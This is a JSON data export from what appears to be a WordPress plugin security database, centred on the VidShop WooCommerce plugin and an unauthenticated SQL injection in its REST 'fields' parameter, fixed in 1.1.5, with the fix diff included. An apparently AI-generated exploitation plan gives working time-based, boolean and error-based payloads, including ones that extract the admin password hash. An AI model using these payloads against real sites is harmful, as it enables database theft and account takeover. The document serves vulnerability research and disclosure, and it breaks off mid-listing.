[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5mERPVFM2w6Qq6Iy3_VVTzEh4wJvczzqZBlug3Lg0RQ":3,"$fHNebJzy8IjrnjhwT3ZfsLW9cENb_ypk8xIOxf4oTE2E":298,"$fnpHNcbZ2eP69JvVwTxfvED_34iQD7VGBFPF4buoQ1HU":302},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":66,"crawl_stats":39,"alternatives":72,"analysis":166,"fingerprints":264},"vidshop-for-woocommerce","VidShop – Shoppable Videos for WooCommerce","1.1.5","WPCreatix","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpcreatix\u002F","\u003Cp>\u003Cstrong>VidShop Transforms Ecommerce with Interactive Shoppable Videos\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>VidShop brings the engaging experience of social media videos directly into your WooCommerce store, creating an immersive, swipe-driven shopping journey. Customers can effortlessly browse, interact with products, and make instant purchases—all within the video.\u003C\u002Fp>\n\u003Cp>Ideal for fashion brands, beauty retailers, electronics stores, home décor merchants, and any business seeking next-level video commerce.\u003C\u002Fp>\n\u003Cp>🎥 \u003Cstrong>Try VidShop Live:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fvidshop.wpcreatix.com\u002F?utm_campaign=vidshop-wordpress-org&utm_medium=demo_link&utm_source=WordPress.org\" rel=\"nofollow ugc\">Interactive Demo\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🚀 \u003Cstrong>Upgrade to Pro:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwpcreatix.com\u002F?utm_campaign=vidshop-wordpress-org&utm_medium=upgrade_link&utm_source=WordPress.org\" rel=\"nofollow ugc\">Get Premium Features\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>🚀 Why Choose VidShop?\u003C\u002Fh3>\n\u003Cp>✅ \u003Cstrong>Social Media-Style Navigation\u003C\u002Fstrong> – Swipe videos for engaging, app-like shopping.\u003Cbr \u002F>\n✅ \u003Cstrong>Seamless Purchase Experience\u003C\u002Fstrong> – Instantly buy products without leaving the video.\u003Cbr \u002F>\n✅ \u003Cstrong>In-Depth Analytics\u003C\u002Fstrong> – Track detailed video interactions and product performance.\u003Cbr \u002F>\n✅ \u003Cstrong>Mobile-Optimized\u003C\u002Fstrong> – Designed specifically for smartphone users.\u003Cbr \u002F>\n✅ \u003Cstrong>Easy to Use\u003C\u002Fstrong> – No coding skills required to set up stunning shoppable videos.\u003Cbr \u002F>\n✅ \u003Cstrong>WooCommerce Native\u003C\u002Fstrong> – Perfectly integrates with your existing WooCommerce store.\u003C\u002Fp>\n\u003Ch3>🎯 Key Features\u003C\u002Fh3>\n\u003Ch3>📊 Analytics Dashboard\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Total & Unique Views\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Average & Total View Time\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Total & Unique Likes\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Add-to-Cart Metrics\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product View Tracking\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Top Videos & Products Insights\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎬 Intuitive Video Management\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Publish, Draft, Trash Status Management\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Easy Video Upload\u003C\u002Fstrong> (WordPress Media Library & Custom URLs)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product Linking & Association\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Actions & Quick Editing\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>⚙️ Smart Shortcode Generator\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Select videos: All or specific IDs\u003C\u002Fli>\n\u003Cli>Customize colors and layouts\u003C\u002Fli>\n\u003Cli>Easy copy-paste into pages\u002Fposts\u003C\u002Fli>\n\u003Cli>Multiple layouts: Grid, Carousel, and Inline (TikTok-style)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>📱 Engaging Frontend Experience\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Swipeable Video Interface\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Interactive Product Circles\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Social Proof with View Counts & Likes\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Real-Time Shopping Cart\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product Variations & Instant Checkout\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Mobile & Desktop Optimized\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🛒 Product Integration\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Unlimited products per video\u003C\u002Fli>\n\u003Cli>Variable product support\u003C\u002Fli>\n\u003Cli>Live inventory synchronization\u003C\u002Fli>\n\u003Cli>Quick add-to-cart functionality\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎨 Brand Customization\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Color schemes aligned with your brand identity\u003C\u002Fli>\n\u003Cli>Responsive layouts and smooth animations\u003C\u002Fli>\n\u003Cli>Touch and mouse-friendly interactions\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🔥 Easy 4-Step Setup\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Step 1: Add Your Video\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Upload or link your video and set a thumbnail.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Step 2: Connect Products\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Select relevant WooCommerce products to link.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Step 3: Generate Shortcode\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Customize your display (video selection, layout, colors).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Step 4: Go Live\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Paste shortcode anywhere on your website to showcase videos instantly.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Example Implementation:\u003C\u002Fstrong>\u003Cbr \u002F>\n    \u003Ccode>[vsfw-videos videos=\"all\" type=\"grid\" color-schema=\"#1e40af\"]\u003Cbr \u002F>\n[vsfw-videos videos=\"123,456,789\" type=\"carousel\" color-schema=\"#e11d48\"]\u003Cbr \u002F>\n[vsfw-videos videos=\"all\" type=\"inline\" color-schema=\"#10b981\"]\u003Cbr \u002F>\n[vsfw-videos videos=\"all\" type=\"stories\" color-schema=\"#1e40af\" autoplay=\"yes\" loop=\"yes\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Ch3>⚡ Performance & Compatibility\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Optimized for speed (lazy loading & caching)\u003C\u002Fli>\n\u003Cli>Compatible with popular caching & CDN solutions\u003C\u002Fli>\n\u003Cli>Mobile-first responsive design\u003C\u002Fli>\n\u003Cli>Secure, clean code with extensive hooks for developers\u003C\u002Fli>\n\u003Cli>Fully translation-ready\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🌟 Industries Benefiting from VidShop\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Fashion & Apparel\u003C\u002Fstrong>: Showcase products in action.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Beauty & Cosmetics\u003C\u002Fstrong>: Demonstrate product transformations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Home & Décor\u003C\u002Fstrong>: Present real-world product placements.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Electronics & Tech\u003C\u002Fstrong>: Highlight features and unboxing.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lifestyle Products\u003C\u002Fstrong>: Engage emotionally and increase sales.\u003C\u002Fli>\n\u003C\u002Ful>\n","Engage customers with swipeable shoppable videos, seamless checkout, and powerful analytics for WooCommerce.",400,1809,100,3,"2026-01-16T15:29:00.000Z","6.9.4","5.8","7.4",[20,21,22,23,24],"mobile-shopping","product-videos","shoppable-videos","video-commerce","woocommerce-videos","https:\u002F\u002Fwpcreatix.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.5.zip",97,1,0,"2026-01-27 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[34],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":28,"patch_diff_files":48,"patch_trac_url":39,"research_status":56,"research_verified":57,"research_rounds_completed":14,"research_plan":58,"research_summary":59,"research_vulnerable_code":60,"research_fix_diff":61,"research_exploit_outline":62,"research_model_used":63,"research_started_at":64,"research_completed_at":65,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":57,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-0702","vidshop-shoppable-videos-for-woocommerce-unauthenticated-time-based-sql-injection-via-fields","VidShop – Shoppable Videos for WooCommerce \u003C= 1.1.4 - Unauthenticated Time-Based SQL Injection via 'fields'","The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'fields' parameter in all versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=1.1.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-28 08:26:56",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa61d8d2a-742f-45f1-9146-f733b80ef195?source=api-prod",[49,50,51,52,53,54,55],"includes\u002Fmodels\u002Fclass-video-event-model.php","includes\u002Fmodels\u002Fclass-video-product-stats-model.php","includes\u002Fmodels\u002Fclass-video-session-model.php","includes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php","includes\u002Futils\u002Fclass-query-builder.php","readme.txt","vidshop-for-woocommerce.php","researched",false,"# Exploitation Research Plan: CVE-2026-0702 - VidShop SQL Injection\n\n## 1. Vulnerability Summary\nThe **VidShop – Shoppable Videos for WooCommerce** plugin (versions \u003C= 1.1.4) is vulnerable to an unauthenticated time-based SQL Injection. The vulnerability exists in the REST API handler for retrieving videos, specifically through the `fields` parameter. The plugin fails to sanitize or properly prepare the list of columns provided by the user before incorporating them into a `SELECT` statement within its custom `Query_Builder`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos` (GET)\n- **Vulnerable Parameter:** `fields`\n- **Authentication:** Unauthenticated (Default). The `check_public_permission` callback in `Videos_Controller` typically allows read access to published videos.\n- **Payload Type:** Time-based blind SQL injection (e.g., `SLEEP()`).\n- **Preconditions:** At least one video must exist in the database (specifically the `vsfw_videos` table) to trigger the execution of the `SELECT` clause for the returned rows.\n\n## 3. Code Flow\n1.  **Request Entry:** An unauthenticated user sends a GET request to `wp-json\u002Fvidshop\u002Fv1\u002Fvideos?fields=...`.\n2.  **Route Registration:** In `includes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php`, the route `\u002Fvideos` is registered with the `get_items` callback.\n3.  **Parameter Handling:** The `get_items` method retrieves the `fields` parameter from the `WP_REST_Request`.\n4.  **Query Building:** The controller uses `Video_Model::query()`, which returns an instance of `VSFW\\Utils\\Query_Builder`.\n5.  **Vulnerable Sink:** The controller calls `$query->select( explode( ',', $request['fields'] ) )`. \n6.  **SQL Construction:** In `includes\u002Futils\u002Fclass-query-builder.php`, the `select()` method populates the `$columns` array. When the query is executed (via `get()` or `get_raw()`), the builder constructs the SQL string by joining these columns: `SELECT field1, field2, [PAYLOAD] FROM wp_vsfw_videos...`.\n7.  **Execution:** The raw string is executed via `$wpdb->get_results()`, triggering the SQL payload.\n\n## 4. Nonce Acquisition Strategy\nREST API `GET` requests in WordPress typically do not require a nonce for public collections. However, if the environment is hardened:\n1.  **Trigger Script Loading:** Create a page containing the VidShop shortcode `[vsfw-videos]`.\n2.  **Identify Variable:** The plugin likely localizes script data via `wp_localize_script`. Based on standard VidShop patterns, check for a global object like `vidshop_data` or `vsfw_settings`.\n3.  **Extraction:**\n    - `wp post create --post_type=page --post_status=publish --post_title=\"VidShop Test\" --post_content='[vsfw-videos]'`\n    - Navigate to the new page.\n    - `browser_eval(\"window.vsfw_settings?.rest_nonce\")` (inferred key).\n4.  **Bypass:** Check `Videos_Controller::check_public_permission`. If it returns `__return_true`, no nonce or authentication is required.\n\n## 5. Exploitation Strategy\nWe will use a time-based payload to confirm the injection.\n\n### Step 1: Confirm Injection\nSubmit a request that causes a 5-second delay.\n- **Method:** `GET`\n- **URL:** `\u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos`\n- **Parameters:**\n    - `fields`: `id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)`\n    - `per_page`: `1` (To ensure the sleep only triggers once)\n\n### Step 2: Data Extraction (Example: Admin Hash)\nExtract the first character of the admin password hash.\n- **Payload:** `id,(SELECT IF(ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),1))`\n- **Note:** `36` is the ASCII for `$`, which is the start of WordPress phpass hashes.\n\n### Request Format (via http_request):\n```json\n{\n  \"method\": \"GET\",\n  \"url\": \"http:\u002F\u002Fvulnerable-hostname.tld\u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos\",\n  \"params\": {\n    \"fields\": \"id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)\",\n    \"per_page\": \"1\"\n  }\n}\n```\n\n## 6. Test Data Setup\n1.  **Ensure WooCommerce is active:** The plugin requires it.\n2.  **Create a Video:** The injection requires at least one row in the videos table to execute the `SELECT` list expressions.\n    ```bash\n    wp eval \"VSFW\\Models\\Video_Model::create(['title' => 'Exploit Test', 'type' => 'media_library', 'thumbnail_id' => 1, 'status' => 'published']);\"\n    ```\n3.  **Verify Public Access:** Ensure the REST API is reachable.\n\n## 7. Expected Results\n- **Vulnerable Version:** The HTTP response will be delayed by approximately 5 seconds.\n- **Patched Version (1.1.5):** The response will return immediately, likely with a `400 Bad Request` or the `fields` parameter will be ignored\u002Fsanitized, returning only valid columns.\n\n## 8. Verification Steps\nAfter the HTTP request, verify the database state or logs:\n1.  **Check Query Logs:** If `WP_DEBUG` and `SAVEQUERIES` are on, check the SQL query logged.\n2.  **No Side Effects:** Since this is a `SELECT` injection, no data should be modified, but time-based confirmation is definitive.\n3.  **Manual Check:** \n    ```bash\n    wp db query \"SELECT id, (SELECT SLEEP(1)) FROM wp_vsfw_videos LIMIT 1;\"\n    ```\n    (This confirms the syntax used in the payload is valid for the target DB).\n\n## 9. Alternative Approaches\n- **Boolean-Based Blind:** If time-based is unreliable, use `fields=id,(CASE WHEN (1=1) THEN 1 ELSE 0 END)` and check if the returned JSON includes a column with value `1` vs `0`.\n- **Error-Based:** If `WP_DEBUG` is enabled, try `fields=id,updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1)),1)`.\n- **Different Endpoint:** Check if `GET \u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos\u002F(?P\u003Cid>[\\d]+)` also processes the `fields` parameter via the same `get_item` logic.","The VidShop plugin for WordPress is vulnerable to unauthenticated time-based SQL Injection via the 'fields' parameter on the REST API videos endpoint. Due to insufficient validation and escaping within the Query_Builder's select method, an attacker can inject arbitrary SQL commands into the column list of a SELECT query.","\u002F\u002F includes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php (around line 309 in v1.1.4)\nif ( $fields ) {\n    $selected_fields = explode( ',', $fields );\n    $query->select( $selected_fields );\n}\n\n---\n\n\u002F\u002F includes\u002Futils\u002Fclass-query-builder.php (line 407 in v1.1.4)\npublic function select( $columns = array( '*' ) ) {\n    $this->columns = is_array( $columns ) ? $columns : func_get_args();\n    return $this;\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.4\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.5\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.4\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php\t2026-01-08 09:26:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.5\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php\t2026-01-16 15:29:18.000000000 +0000\n@@ -180,6 +180,68 @@\n \t}\n \n \t\u002F**\n+\t * Get allowed fields for select query (whitelist for SQL injection prevention)\n+\t *\n+\t * @return array\n+\t *\u002F\n+\tprivate function get_allowed_fields() {\n+\t\treturn array(\n+\t\t\t'id',\n+\t\t\t'title',\n+\t\t\t'type',\n+\t\t\t'source_url',\n+\t\t\t'thumbnail_id',\n+\t\t\t'video_id',\n+\t\t\t'settings',\n+\t\t\t'status',\n+\t\t\t'created_by',\n+\t\t\t'created_at',\n+\t\t\t'updated_at',\n+\t\t);\n+\t}\n+\n+\t\u002F**\n+\t * Sanitize fields parameter - whitelist validation\n+\t *\n+\t * @param string $fields Comma-separated fields.\n+\t * @return string Sanitized fields.\n+\t *\u002F\n+\tpublic function sanitize_fields_param( $fields ) {\n+\t\tif ( empty( $fields ) ) {\n+\t\t\treturn '';\n+\t\t}\n+\t\terror_log( 'Sanitize fields parameter: ' . $fields );\n+\t\t$requested_fields = array_map( 'trim', explode( ',', $fields ) );\n+\t\t$allowed_fields   = $this->get_allowed_fields();\n+\t\t$valid_fields     = array_filter(\n+\t\t\t$requested_fields,\n+\t\t\tfunction ( $field ) use ( $allowed_fields ) {\n+\t\t\t\treturn in_array( $field, $allowed_fields, true );\n+\t\t\t}\n+\t\t);\n+\t\terror_log( 'Valid fields: ' . implode( ',', $valid_fields ) );\n+\t\treturn implode( ',', $valid_fields );\n+\t}\n+\n \t\u002F**\n \t * Get collection parameters\n \t *\u002F\n@@ -222,12 +284,14 @@\n \t\t\t\t'enum'        => array( 'asc', 'desc' ),\n \t\t\t),\n \t\t\t'fields'   => array(\n-\t\t\t\t'description' => __( 'Comma-separated list of fields to include in the response.', 'vidshop-for-woocommerce' ),\n-\t\t\t\t'type'        => 'string',\n+\t\t\t\t'description'       => __( 'Comma-separated list of fields to include in the response.', 'vidshop-for-woocommerce' ),\n+\t\t\t\t'type'              => 'string',\n+\t\t\t\t'sanitize_callback' => array( $this, 'sanitize_fields_param' ),\n \t\t\t),\n \t\t\t'ids'      => array(\n-\t\t\t\t'description' => __( 'Comma-separated list of video IDs.', 'vidshop-for-woocommerce' ),\n-\t\t\t\t'type'        => 'string',\n+\t\t\t\t'description'       => __( 'Comma-separated list of video IDs.', 'vidshop-for-woocommerce' ),\n+\t\t\t\t'type'              => 'string',\n+\t\t\t\t'sanitize_callback' => array( $this, 'sanitize_ids_param' ),\n \t\t\t),\n \t\t);\n \n@@ -303,7 +368,8 @@\n \t\t\t$query->order_by( $orderby, $order );\n \t\t}\n \n-\t\tif ( $fields ) {\n+\t\t\u002F\u002F Select specific fields (already validated via whitelist in sanitize_callback)\n+\t\tif ( ! empty( $fields ) ) {\n \t\t\t$selected_fields = explode( ',', $fields );\n \t\t\t$query->select( $selected_fields );\n \t\t}","The exploit targets the public WordPress REST API endpoint \u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos. An attacker makes a GET request and provides a SQL payload within the 'fields' parameter. Because the plugin uses explode() on the 'fields' string and passes the resulting array directly into a SELECT statement without validation, an attacker can append a subquery using time-based functions like SLEEP(). \n\nPayload Structure: \nGET \u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos?fields=id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)&per_page=1\n\nAuthentication: None required (Unauthenticated).\nCondition: At least one entry must exist in the 'vsfw_videos' table for the SELECT query to execute the SLEEP payload.","gemini-3-flash-preview","2026-05-04 22:58:55","2026-05-04 22:59:13",{"slug":67,"display_name":7,"profile_url":8,"plugin_count":68,"total_installs":69,"avg_security_score":70,"avg_patch_time_days":28,"trust_score":70,"computed_at":71},"wpcreatix",2,900,99,"2026-05-19T21:59:07.392Z",[73,96,112,130,146],{"slug":74,"name":75,"version":76,"author":77,"author_profile":78,"description":79,"short_description":80,"active_installs":81,"downloaded":82,"rating":13,"num_ratings":83,"last_updated":84,"tested_up_to":85,"requires_at_least":86,"requires_php":87,"tags":88,"homepage":92,"download_link":93,"security_score":94,"vuln_count":68,"unpatched_count":68,"last_vuln_date":95,"fetched_at":31},"live-shopping-video-streams","Live Shopping & Shoppable Videos For WooCommerce","2.2.0","Channelize.io Team","https:\u002F\u002Fprofiles.wordpress.org\u002Fchannelizeio\u002F","\u003Cp>\u003Cstrong>“Live Shopping”\u003C\u002Fstrong> & \u003Cstrong>“Shoppable Videos”\u003C\u002Fstrong> by Channelize.io enable Brands to Boost Sales and Enhance their Brand Perception by connecting better with their Buyers and Showcasing their Products in ways that lead to Informed, Trusted & Accelerated Purchases by Buyers. Going Live & Uploading Videos are easy. They’re mobile responsive and do not impact site speed. With add-to-cart within videos, buyers get a watch & buy experience that drives Conversions. Syncing of product info, availability & Shopify Cart makes a seamless experience.\u003C\u002Fp>\n\u003Cp>Live Shopping or \u003Cstrong>“Livestream Shopping\u003C\u002Fstrong>” lets you sell through \u003Cstrong>“Live Video Shopping\u003C\u002Fstrong>“, engage with your buyers in real-time & attract new prospects with exclusive products & deals. It helps brands & store owners to elevate Product Experiences for buyers, enable In-context Buying, connect with buyers in real-time, & Foster Communities, all while generating incredible Sales. All this buyer engagement and interaction happens right within your websites via our \u003Cstrong>“Live Shopping\u003C\u002Fstrong>” App.\u003C\u002Fp>\n\u003Cp>Shoppable Videos or Short form Videos enable you to make any Video you already have, Shoppable in seconds & Boost Sales & Engagement. Easily engage & convert shoppers with a watch & buy experience and effectively reuse your TikTok & Instagram Reel Videos on your website.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Key Features\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>“Live Shop” page for your store\u003C\u002Fli>\n\u003Cli>In-show Products Promotion, Product Spotlight, & Add-to-Cart\u003C\u002Fli>\n\u003Cli>Live Chat with Pinned Messages, & Reactions for the audience\u003C\u002Fli>\n\u003Cli>Host App (iOS & Android) for Hosts to go Live\u003C\u002Fli>\n\u003Cli>Production Dashboard\u003C\u002Fli>\n\u003Cli>Live Chat moderation\u003C\u002Fli>\n\u003Cli>Multi-host Selling\u003C\u002Fli>\n\u003Cli>Real-time Products Update\u003C\u002Fli>\n\u003Cli>Multistreaming\u003C\u002Fli>\n\u003Cli>Custom RTMP Support\u003C\u002Fli>\n\u003Cli>Shopping Show Analytics\u003C\u002Fli>\n\u003Cli>Recordings for post-live engagement & more sales\u003C\u002Fli>\n\u003Cli>Multi-lingual interface\u003C\u002Fli>\n\u003Cli>Embed Shopping Shows\u003C\u002Fli>\n\u003Cli>New Buyers’ Interface\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Generate more sales\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Live Selling Shows & Shoppable Videos to \u003Cstrong>Boost Conversions\u003C\u002Fstrong> & \u003Cstrong>Buyer Retention\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Reuse existing UGC videos from \u003Cstrong>Instagram\u003C\u002Fstrong>, \u003Cstrong>TikTok\u003C\u002Fstrong> & \u003Cstrong>Facebook\u003C\u002Fstrong> with a single click\u003C\u002Fli>\n\u003Cli>Easy Go-live with Host Apps or \u003Cstrong>RTMP support\u003C\u002Fstrong> using Cameras & Pre-recorded Videos\u003C\u002Fli>\n\u003Cli>Video Listing Page; Display videos anywhere with Layouts: \u003Cstrong>Carousel & Floating\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Simulcasting, Email & SMS Notifications, Unique URL, etc to get large watchers\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Benefits\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Improved conversion rates\u003C\u002Fli>\n\u003Cli>Increased session time & repeat customer visits\u003C\u002Fli>\n\u003Cli>Gather real-time analytics during Live Shopping Shows\u003C\u002Fli>\n\u003Cli>Post-event metrics & KPIs to analyze sales\u003C\u002Fli>\n\u003Cli>Lowered Customer Acquisition Cost (CAC)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Exclusive Support\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Personalized Free Demo to help you begin.\u003C\u002Fli>\n\u003Cli>Rolling out new features & iterating existing ones time to time\u003C\u002Fli>\n\u003Cli>Refer to Help Center, eBooks, Blogs, & Tutorials to get started quickly\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Ready to start your Live Selling journey?\u003C\u002Fstrong>\u003Cbr \u002F>\nEmail \u003Ca href=\"mailto:info@Channelize.io\" rel=\"nofollow ugc\">info@channelize.io\u003C\u002Fa> to book a quick demo call!\u003C\u002Fp>\n","Easy-to-install Plugin that adds Live Shopping, Shoppable Videos & Live Commerce as Sales Channels to WooCommerce Stores to Sell & Promote Products",600,8520,8,"2025-07-30T12:22:00.000Z","6.8.5","5.0","7.2",[89,90,91,22,23],"live-selling","live-shopping","live-video-shopping","http:\u002F\u002FN\u002FA","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flive-shopping-video-streams.2.2.0.zip",56,"2025-12-31 00:00:00",{"slug":97,"name":98,"version":99,"author":100,"author_profile":101,"description":102,"short_description":103,"active_installs":29,"downloaded":104,"rating":29,"num_ratings":29,"last_updated":105,"tested_up_to":85,"requires_at_least":106,"requires_php":18,"tags":107,"homepage":110,"download_link":111,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"immersive-shopping-and-videos","Immersive Shopping and Videos","1.16","aveytsman","https:\u002F\u002Fprofiles.wordpress.org\u002Faveytsman\u002F","\u003Cp>Transform Your Online Store\u003C\u002Fp>\n\u003Cp>Transform your online store with technology that help customers see, understand, and buy your products with confidence with or WITHOUT human interference. Perfect for products that need to be explained or demonstrated.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Show customers how your product will work for them RIGHT WHEN THEY NEED IT THE MOST.\u003C\u002Fstrong> Guide them all the way to purchase with unparalleled shopping experience.\u003C\u002Fp>\n\u003Ch3>Results\u003C\u002Fh3>\n\u003Cp>Much higher conversions, reduced returns, increased AOVs, and solidified, trustworthy customer relationships.\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Autonomous Sales Agent\u003C\u002Fstrong> is equivalent to store owner answering questions 24\u002F7  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Personal Shopping Assistant\u003C\u002Fstrong> guides customers through purchases via video support  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Live shopping\u003C\u002Fstrong> with instant purchasing and sales tracking  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Recorded shoppable videos\u003C\u002Fstrong> with UGC sales tracking  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Short product videos\u003C\u002Fstrong> that sell better than pictures\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>See It In Action\u003C\u002Fh3>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FqWz-uyKltlo?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" 